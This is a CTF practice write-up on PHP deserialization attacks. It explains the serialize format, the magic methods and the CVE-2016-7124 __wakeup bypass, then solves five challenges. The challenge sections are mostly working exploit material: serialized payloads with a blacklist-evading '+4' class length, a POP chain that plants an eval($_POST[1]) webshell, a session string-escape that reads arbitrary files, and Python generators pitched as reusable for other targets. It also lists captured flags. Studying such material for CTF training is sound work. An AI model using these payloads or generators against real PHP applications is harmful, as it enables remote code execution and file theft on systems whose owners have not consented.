
Weekly Practice 3 (PHP deserialization)



serialize() function

$s = serialize($variable); // turns the variable's data into a string

file_put_contents('./target.txt', $s); // saves $s to the given file

Type letters used in the format:

a - array                b - boolean
d - double               i - integer
o - common object        r - reference
s - string               C - custom object
O - class (object)       N - null
R - pointer reference    U - unicode string

In practice serialize() writes objects with O (C appears only for classes implementing Serializable); the tags you will meet in challenges are O, s, i, d, b, N and a.

Knowing the type letters, you can read PHP's serialization format:

O:4:"User":2:{s:3:"age";i:20;s:4:"name";s:4:"daye";}

object tag:class-name length:"class name":number of properties:{type:length:"property name";type:length:"value";...}

Every property is a string key followed by its value. String lengths count bytes, and the names of non-public properties are mangled: a private property is stored as "\0ClassName\0name" and a protected one as "\0*\0name", NUL bytes included in the length. That is why the payloads later on contain %00 and lengths that look too long.
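To make the format concrete, here is a small reader for it in Python, written for this page rather than taken from PHP or from any of the challenge sources. It handles the tags that appear in this write-up (i, b, d, s, N, a, O), checks string lengths and property counts the way unserialize() does, and undoes the name mangling PHP applies to private and protected properties. The class names and values in the examples at the bottom come from this page.

```python
from dataclasses import dataclass, field


@dataclass
class PHPObject:
    class_name: str
    props: dict = field(default_factory=dict)   # plain property name -> value
    scope: dict = field(default_factory=dict)   # plain property name -> visibility


def demangle(name: str):
    """Undo PHP's property-name mangling: "\0Class\0x" is private, "\0*\0x" is protected."""
    if name.startswith("\0"):
        owner, _, plain = name[1:].partition("\0")
        return ("protected" if owner == "*" else "private"), plain
    return "public", name


class _Reader:
    def __init__(self, data: bytes):
        self.data, self.pos = data, 0

    def expect(self, tok: bytes) -> None:
        if not self.data.startswith(tok, self.pos):
            raise ValueError(f"expected {tok!r} at offset {self.pos}")
        self.pos += len(tok)

    def until(self, delim: bytes) -> str:
        end = self.data.index(delim, self.pos)          # ValueError if missing
        tok, self.pos = self.data[self.pos:end], end + len(delim)
        return tok.decode("latin-1")

    def string(self) -> str:
        # s:<len>:"<bytes>";  <len> counts bytes, so "\0Demo\0file" is s:10.
        # Like unserialize(), trust <len> and only verify the '";' after it.
        length = int(self.until(b":"))
        self.expect(b'"')
        raw = self.data[self.pos:self.pos + length]
        if len(raw) != length:
            raise ValueError("string runs past the end of the input")
        self.pos += length
        self.expect(b'";')
        return raw.decode("latin-1")

    def value(self):
        tag = self.data[self.pos:self.pos + 1]
        self.pos += 1
        if tag == b"N":
            self.expect(b";")
            return None
        self.expect(b":")
        if tag == b"i":
            return int(self.until(b";"))
        if tag == b"b":
            return self.until(b";") == "1"
        if tag == b"d":
            return float(self.until(b";"))
        if tag == b"s":
            return self.string()
        if tag == b"a":
            count = int(self.until(b":"))
            self.expect(b"{")
            items = {}
            for _ in range(count):
                key = self.value()
                items[key] = self.value()
            self.expect(b"}")
            return items
        if tag == b"O":
            self.until(b":")                     # class-name length; the name is quoted anyway
            self.expect(b'"')
            obj = PHPObject(self.until(b'":'))
            count = int(self.until(b":"))         # declared property count
            self.expect(b"{")
            for _ in range(count):               # fewer real properties than declared -> error here
                visibility, name = demangle(self.value())
                obj.props[name] = self.value()
                obj.scope[name] = visibility
            self.expect(b"}")
            return obj
        raise ValueError(f"unknown type tag {tag!r} at offset {self.pos - 1}")


def php_unserialize(data: bytes):
    """Decode one serialized PHP value; bytes after it are ignored, as PHP does."""
    return _Reader(data).value()


def is_valid(data: bytes) -> bool:
    """True when the data parses without error."""
    try:
        php_unserialize(data)
        return True
    except (ValueError, IndexError):
        return False


if __name__ == "__main__":
    # The User example from the text:
    print(php_unserialize(b'O:4:"User":2:{s:3:"age";i:20;s:4:"name";s:4:"daye";}'))
    # Private properties carry the class name between NUL bytes (14 bytes each here):
    print(php_unserialize(b'O:4:"Name":2:{s:14:"\0Name\0username";s:5:"admin";s:14:"\0Name\0password";i:100;}'))
```

Feed it a string whose declared property count is higher than the properties present and it raises, which is the situation the __wakeup() bypass below relies on; feed it a string with trailing junk after the closing brace and it returns the value and ignores the rest, which the string-escape technique at the end of the page relies on.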

unserialize() function

$s = file_get_contents('./target.txt'); // read the file contents (the string serialized earlier)

$variable = unserialize($s); // deserialize that text back into the variable

Magic methods

__construct()   called when an object is created
__destruct()    called when an object is destroyed: at script end, when its last reference goes away, or when unserialize() aborts and releases a half-built object
__sleep()       triggered by serialize()
__wakeup()      triggered by unserialize()
__toString()    triggered when the object is used as a string (echo, concatenation, string functions); the return value must be a string
__call()        triggered when an inaccessible (undefined or not visible) method is called in object context
__callStatic()  triggered when an inaccessible method is called in static context
__get()         reading an inaccessible property
__set()         writing an inaccessible property
__isset()       isset() or empty() on an inaccessible property
__unset()       unset() on an inaccessible property
__invoke()      triggered when the script calls the object as a function; PHP 5.3.0 and later only


__wakeup() bypass

Affected versions:

PHP 5 < 5.6.25
PHP 7 < 7.0.10

PHP deserialization vulnerability CVE-2016-7124

Key point: when the property count declared in the serialized string is larger than the real number of properties, unserialize() fails part-way and __wakeup() is never executed. The properties parsed before the failure have already been assigned, and the half-built object is released afterwards, so __destruct() (and anything reachable from it) still runs with attacker-chosen values. Raising the count is therefore enough to skip a __wakeup() that would otherwise reset them.

 

1. unserialize3

class xctf{                          // a class named xctf
    public $flag = '111';            // public property $flag, value 111
    public function __wakeup(){      // __wakeup() prints "bad requests" and exits the script
        exit('bad requests');
    }
}
?code=

The code parameter takes the serialized xctf object. Declaring more properties than the one it really has skips __wakeup(), so the script continues instead of exiting.

The answer is: cyberpeace{24a1e95dab10ea486aed8d9ffccbcbd1}

2. Web_php_unserialize

highlight_file() prints a file with PHP syntax highlighting.

Syntax

highlight_file(filename, return)
Parameter   Description
filename    Required. Path of the PHP file to highlight.
return      Optional. If true, the function returns the highlighted code instead of printing it.
<?php 
class Demo { 
    private $file = 'index.php';
    public function __construct($file) { 
        $this->file = $file;                       // assignment
    }

    function __destruct() { 
        echo @highlight_file($this->file, true);   // prints whatever $file points at
    }

    function __wakeup() {                          // must be bypassed
        if ($this->file != 'index.php') { 
            //the secret is in the fl4g.php         (hint)
            $this->file = 'index.php'; 
          } 
    } 

}
if (isset($_GET['var'])) { 
    $var = base64_decode($_GET['var']);            // base64-decode the input
    if (preg_match('/[oc]:\d+:/i', $var)) {        // blacklist: "O:4:" and "C:..."; \d+ does not match "+", so "O:+4:" slips through
        die('stop hacking!'); 
    } else {
        @unserialize($var); 
    } 
} else { 
    highlight_file("index.php"); 
} 
?>

Payload (before base64-encoding it into var; \0 stands for a NUL byte):

O:+4:"Demo":3:{s:10:"\0Demo\0file";s:8:"fl4g.php";}

$file is private, so its serialized name is NUL + Demo + NUL + file, 10 bytes. The declared count 3 is larger than the real 1, so __wakeup() is skipped (CVE-2016-7124) and cannot reset $file; the "+" in the class-name length defeats /[oc]:\d+:/i while PHP before 7.1 still parses it; __destruct() then highlights fl4g.php, which contains:

$flag="ctf{b17bd4c7-34c9-4526-8fa8-a0794a197013}"

 

3. [极客大挑战 2019]PHP

The entry script includes class.php and deserializes user input:

<?php
    include 'class.php';
    $select = $_GET['select'];     // user input
    $res=unserialize(@$select);
?>

class.php:

<?php
include 'flag.php';
error_reporting(0);
class Name{
    private $username = 'nonono';
    private $password = 'yesyes';        // defaults
    public function __construct($username,$password){
        $this->username = $username;
        $this->password = $password;     // assignment
    }
    function __wakeup(){
        $this->username = 'guest';       // must be bypassed
    }
    function __destruct(){
        if ($this->password != 100) {    // need password == 100
            echo "</br>NO!!!hacker!!!</br>";
            echo "You name is: ";
            echo $this->username;echo "</br>";
            echo "You password is: ";
            echo $this->password;echo "</br>";
                  die();
        }
        if ($this->username === 'admin') {  // need username === 'admin'
            global $flag;
            echo $flag;
        }else{
            echo "</br>hello my friend~~</br>sorry i can't give you the flag!";
            die();     
        }
    }
}
?>

 

?select=O:4:"Name":3:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";i:100;}

Both properties are private, so their serialized names are \0Name\0username and \0Name\0password (14 bytes each); %00 URL-encodes the NUL bytes, which cannot be typed literally. The count 3 exceeds the real 2, so __wakeup() never resets username to guest, and __destruct() sees username === 'admin' and password == 100 (the loose != check accepts the integer).

 

flag{d2e7fc8f-788c-45b9-a16b-a84c7a09ee20}
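The three payloads above differ only in details, so one generator covers the __wakeup() bypass for unserialize3, Web_php_unserialize and the 极客大挑战 challenge. This is an added Python example, not the challenge authors' code: it serializes the object the way PHP would (including the NUL-byte mangling of private properties), then raises the declared property count by one so that unserialize() fails after assigning the properties (CVE-2016-7124) and, where a blacklist like /[oc]:\d+:/i is in the way, writes the class-name length as +4, which PHP before 7.1 accepts. The class and property names come from the challenges; the base64 and URL encoding match the parameter each challenge reads.

```python
import base64
import re
from urllib.parse import quote

# Added example. Class and property names come from the challenges on this page;
# everything else (the PHPObj helper, the +1 count, the encoders) is this script's choice.


class PHPObj:
    """A PHP object to serialize: class name plus (visibility, name, value) triples."""

    def __init__(self, cls, props):
        self.cls, self.props = cls, list(props)


def mangle(cls: str, visibility: str, name: str) -> str:
    """Property names as they appear inside serialize() output."""
    if visibility == "private":
        return f"\0{cls}\0{name}"      # NUL, class name, NUL, property name
    if visibility == "protected":
        return f"\0*\0{name}"
    return name


def php_serialize(v) -> str:
    """serialize() for the value kinds the payloads need; string lengths are byte counts."""
    if v is None:
        return "N;"
    if isinstance(v, bool):
        return f"b:{int(v)};"
    if isinstance(v, int):
        return f"i:{v};"
    if isinstance(v, str):
        return f's:{len(v.encode("utf-8"))}:"{v}";'
    if isinstance(v, PHPObj):
        body = "".join(php_serialize(mangle(v.cls, vis, n)) + php_serialize(x)
                       for vis, n, x in v.props)
        return f'O:{len(v.cls)}:"{v.cls}":{len(v.props)}:{{{body}}}'
    raise TypeError(f"unsupported value {v!r}")


def wakeup_bypass(obj: PHPObj, plus: bool = False) -> str:
    """Serialize obj, then declare one property more than it has (CVE-2016-7124).

    PHP assigns the properties it finds, hits the missing one, aborts without
    calling __wakeup(), and releases the half-built object, so __destruct()
    still runs with our values. With plus=True the class-name length is written
    as "+4", which /[oc]:\\d+:/i does not match but PHP before 7.1 still parses.
    """
    head = f'O:{len(obj.cls)}:"{obj.cls}":{len(obj.props)}:'
    full = php_serialize(obj)
    assert full.startswith(head)
    sign = "+" if plus else ""
    return f'O:{sign}{len(obj.cls)}:"{obj.cls}":{len(obj.props) + 1}:' + full[len(head):]


def blacklist_hit(payload: str) -> bool:
    """The Web_php_unserialize check: preg_match('/[oc]:\\d+:/i', $var)."""
    return re.search(r"[oc]:\d+:", payload, re.IGNORECASE) is not None


def payload_unserialize3() -> str:
    # ?code=<this>; the real count is 1, we declare 2
    return wakeup_bypass(PHPObj("xctf", [("public", "flag", "111")]))


def payload_web_php_unserialize() -> str:
    # $file is private, so its serialized name is "\0Demo\0file" (10 bytes)
    return wakeup_bypass(PHPObj("Demo", [("private", "file", "fl4g.php")]), plus=True)


def payload_geek_php() -> str:
    # password must compare loosely equal to 100; an integer does it
    return wakeup_bypass(PHPObj("Name", [("private", "username", "admin"),
                                          ("private", "password", 100)]))


def as_var_param(raw: str) -> str:
    """Web_php_unserialize reads base64 from ?var=."""
    return base64.b64encode(raw.encode("utf-8")).decode()


def as_select_param(raw: str) -> str:
    """The 极客大挑战 challenge reads ?select= as-is; NUL bytes must travel as %00."""
    return quote(raw, safe='":;{}')


if __name__ == "__main__":
    print("unserialize3        ?code=" + payload_unserialize3())
    print("Web_php_unserialize ?var=" + as_var_param(payload_web_php_unserialize()))
    print("极客大挑战 PHP        ?select=" + as_select_param(payload_geek_php()))
```

Adding one to the count is enough; the write-up's 3 for Demo works just as well, since any declared count above the real one triggers the failure.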

4. web/fxlh1/

<?php
class crow
{
    public $v1;
    public $v2;
    function eval() {
        echo new $this->v1($this->v2);
    }
    public function __invoke()
    {
        $this->v1->world();      // 3. world() does not exist on $v1, so its __call() fires
    }
}
class fin
{
    public $f1;
    public function __destruct()
    {
        echo $this->f1 . '114514';   // 6. entry point: concatenation calls __toString() on $f1
    }
    public function run()
    {
        ($this->f1)();          
    }
    public function __call($a, $b)
    {
        echo $this->f1->get_flag();  // 2. calls get_flag() on $f1
    }
}
class what
{
    public $a;
    public function __toString()
    {
        $this->a->run();        // 5. calls run() on $a
        return 'hello';
    }
}
class mix
{
    public $m1;
    public function run()
    {
        ($this->m1)();          // 4. calling an object as a function fires __invoke()
    }
    public function get_flag()
    {
        eval('#'.$this->m1);      // 1. the sink
    }
}
highlight_file(__FILE__);
if (isset($_POST['pop'])) {
    unserialize($_POST['pop']);
}

The numbers trace the chain backwards from the sink; it executes 6 → 5 → 4 → 3 → 2 → 1: fin::__destruct → what::__toString → mix::run (fin::run works too, since it also calls its property) → crow::__invoke → fin::__call → mix::get_flag. The sink prepends '#', which would comment out a plain payload, but a one-line comment ends at "?>" as well as at a newline, so m1 = ?><?=eval($_POST[1]); closes the comment, reopens PHP with <?= and plants an eval of POST parameter 1.
Generator (the classes are redeclared without their methods so the serialized output is identical; each constructor sets only the property its link needs, and crow's unset $v2 still serializes as N):

<?php
class crow
{
    public $v1;
    public $v2;

    public function __construct($v1)
    {
        $this->v1 = $v1;
    }
}

class fin
{
    public $f1;

    public function __construct($f1)
    {
        $this->f1 = $f1;
    }
}

class what
{
    public $a;

    public function __construct($a)
    {
        $this->a = $a;
    }
}
class mix
{
    public $m1;

    public function __construct($m1)
    {
        $this->m1 = $m1;
    }

}

$f = new mix("?><?=eval(\$_POST[1]);");   // sink: '#' . m1, "?>" ends the comment, "<?=" reopens PHP
$e = new fin($f);                         // fin::__call -> $f1->get_flag()
$d = new crow($e);                        // crow::__invoke -> $v1->world(), undefined, so __call
$c = new mix($d);                         // mix::run -> ($m1)() fires __invoke
$b = new what($c);                        // what::__toString -> $a->run()
$a = new fin($b);                         // fin::__destruct echoes $f1 . '114514' -> __toString
echo urlencode(serialize($a));
// serialize($a) before urlencode (the author's copy is cut off here):
//O:3:"fin":1:{s:2:"f1";O:4:"what":1:{s:1:"a";O:3:"mix":1:{s:2:"m1";O:4:"crow":2:{s:2:"v1";O:3:"fin":1:{s:2:"f1";O:3:"mix":1:{s:2:"m1";s:21:"?>
// The payload as submitted. It puts a fin object in what->a instead of mix, which works the same way because fin::run() also calls ($this->f1)(). The target reads the payload from the pop parameter, and the trailing &1 is the POST parameter 1 that the planted eval($_POST[1]) executes:
//cmd=O:3:"fin":1:{s:2:"f1";O:4:"what":1:{s:1:"a";O:3:"fin":1:{s:2:"f1";O:4:"crow":2:{s:2:"v1";O:3:"fin":1:{s:2:"f1";O:3:"mix":1:{s:2:"m1";s:21:"?><?=eval($_POST[1]);";}}s:2:"v2";N;}}}}&1

5. [安洵杯 2019]easy_serialize_php 1

Key point

PHP deserialization string escape: filter() deletes words from data that serialize() has already length-prefixed, so the declared lengths are now too long and unserialize() reads past the original boundaries into text we control. The key-escape form, before the filter (the value is 48 bytes long):

a:2:{s:7:"flagphp";s:48:";s:1:"a";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}

After the filter has removed flagphp:

a:2:{s:7:"";s:48:";s:1:"a";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}

The 7-byte key now consumes ";s:48: , its value becomes s:1:"a", the injected s:3:"img" entry (base64 of d0g3_f1ag.php) is the second element, and } closes the array; the real img entry after it is trailing data that unserialize() ignores.
<?php
$function = @$_GET['f'];
// the filter: strips these words after serialization, which is the bug
function filter($img){
    $filter_arr = array('php','flag','php5','php4','fl1g');
    $filter = '/'.implode('|',$filter_arr).'/i';
    return preg_replace($filter,'',$img);
}
if($_SESSION){
    unset($_SESSION);
}
// initial values
$_SESSION["user"] = 'guest';
$_SESSION['function'] = $function;
extract($_POST);                            // variable overwrite: a POST _SESSION[...] array replaces $_SESSION entirely
if(!$function){
    echo '<a href="index.php?f=highlight_file">source_code</a>';
}
if(!$_GET['img_path']){
    $_SESSION['img'] = base64_encode('guest_img.png');      // img is assigned after extract(), so it cannot be overwritten directly
}else{
    $_SESSION['img'] = sha1(base64_encode($_GET['img_path']));
}

$serialize_info = filter(serialize($_SESSION));

if($function == 'highlight_file'){
    highlight_file('index.php');
}else if($function == 'phpinfo'){
    eval('phpinfo();'); //maybe you can find something in here!  (phpinfo reveals d0g3_f1ag.php)
}else if($function == 'show_image'){                   // the branch we need: f=show_image
    $userinfo = unserialize($serialize_info);
    echo file_get_contents(base64_decode($userinfo['img']));    // target: img decides which file is read
} 

First attempt (POST, with f=show_image in the query string):

_SESSION[function]=show_image&_SESSION[1]=";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}

which the server serializes and filters to:

a:3:{s:8:"function";s:10:"show_image";i:1;s:41:"";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}";s:3:"img";s:40:"349ae14b24d23cca50fb83d84fb6039f882a3645";}

Nothing in it is filtered, so every declared length still fits: the 41-byte injected text is simply read as the value of key 1 and img stays the sha1 value the script wrote. Padding the function value with 12 bytes of filtered words (php repeated four times, or flag three times) fixes that: its declared length becomes 22 while the filtered text shrinks back to show_image, and key 1 gets a 60-byte tail that supplies the remaining two elements of the a:3 array (a throwaway qwe entry and the img entry). After the filter:

a:3:{s:8:"function";s:22:"show_image";i:1;s:60:"";s:3:"qwe";s:2:"qw";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}";s:3:"img";s:40:"349ae14b24d23cca50fb83d84fb6039f882a3645";}

Reading 22 bytes for the function value swallows ";i:1;s:60:" (the closing quote, the serialized key 1 and the header of its value), the leading quote of the tail closes that string, and the tail then parses as the qwe and img entries; } closes the array with exactly three elements, and the real img entry behind it is trailing data that unserialize() ignores. show_image then reads d0g3_f1ag.php.

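The calculation behind the working payload, as an added Python example (not the challenge's code): it reproduces the server's serialize-then-filter step for a POST _SESSION array, builds both the value-escape variant used above (padding the function value with filtered words so its declared length stays while the text shrinks to show_image) and the key-escape variant from the key-point section, and reports exactly which bytes the overread swallows. The pad words, the throwaway qwe key and the guest img default are choices made here; d0g3_f1ag.php and the filter list come from the challenge.

```python
import base64
import hashlib
import re

# Added example: reproduces easy_serialize_php's serialize-then-filter step and
# builds the escape payloads. Pad words and the throwaway "qwe" key are this
# script's choices; d0g3_f1ag.php and the filter words come from the challenge.

FILTER_WORDS = ["php", "flag", "php5", "php4", "fl1g"]
FILTER_RE = re.compile("|".join(FILTER_WORDS), re.IGNORECASE)


def php_filter(s: str) -> str:
    """filter() from the challenge: preg_replace('/php|flag|php5|php4|fl1g/i', '', $s)."""
    return FILTER_RE.sub("", s)


def ser(v) -> str:
    """serialize() for the int and string values a flat $_SESSION holds."""
    if isinstance(v, int):
        return f"i:{v};"
    return f's:{len(v.encode())}:"{v}";'


def ser_array(d: dict) -> str:
    body = "".join(ser(k) + ser(v) for k, v in d.items())
    return f"a:{len(d)}:{{{body}}}"


def server_side(post_session: dict, img_path=None) -> str:
    """What the target does after extract($_POST): append img, serialize, filter."""
    session = dict(post_session)               # extract() replaced $_SESSION wholesale
    if img_path is None:
        session["img"] = base64.b64encode(b"guest_img.png").decode()
    else:
        session["img"] = hashlib.sha1(base64.b64encode(img_path.encode())).hexdigest()
    return php_filter(ser_array(session))


def pad(n: int) -> str:
    """n characters made only of filtered words, so the filter deletes exactly n bytes."""
    for flags in range(n // 4 + 1):
        rest = n - 4 * flags
        if rest % 3 == 0:
            return "php" * (rest // 3) + "flag" * flags
    raise ValueError(f"cannot build a pad of length {n}")


def value_escape(target: str) -> dict:
    """Pad the 'function' value; the overread eats into the next entry and lands in our tail."""
    img = base64.b64encode(target.encode()).decode()
    # Tail = closing quote for the overread + the two entries that complete an a:3 array.
    tail = '";' + ser("qwe") + ser("qw") + ser("img") + ser(img) + "}"
    key = 1
    # Bytes between the real end of "show_image" and the start of the tail:
    # '";' + the serialized key + the 's:<len>:"' header of the tail's own value.
    swallowed = 2 + len(ser(key)) + len(f's:{len(tail)}:"')
    return {"function": "show_image" + pad(swallowed), key: tail}


def key_escape(target: str) -> dict:
    """Make the key vanish instead; its declared length then eats '";s:<len>:'."""
    img = base64.b64encode(target.encode()).decode()
    value = ";" + ser("a") + ser("img") + ser(img) + "}"   # value of the swallowed key, then img, then }
    key_len = 2 + len(f"s:{len(value)}:")
    return {pad(key_len): value}


def overread(filtered: str, key: str, real_value: str) -> str:
    """The bytes unserialize() swallows into `key`'s value once the filter has shrunk it."""
    marker = ser(key) + "s:"
    i = filtered.index(marker) + len(marker)
    j = filtered.index(':"', i)
    declared = int(filtered[i:j])
    return filtered[j + 2 + len(real_value): j + 2 + declared]


if __name__ == "__main__":
    post = value_escape("d0g3_f1ag.php")
    out = server_side(post)
    print("POST:", "&".join(f"_SESSION[{k}]={v}" for k, v in post.items()))
    print("after filter:", out)
    print("swallowed:", repr(overread(out, "function", "show_image")))
    print("key escape:", server_side(key_escape("d0g3_f1ag.php")))
```

server_side() is the part to reuse when the filter list or the session layout differs: change FILTER_WORDS and the pad() alphabet together, since pad() must only ever emit strings the filter deletes completely.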
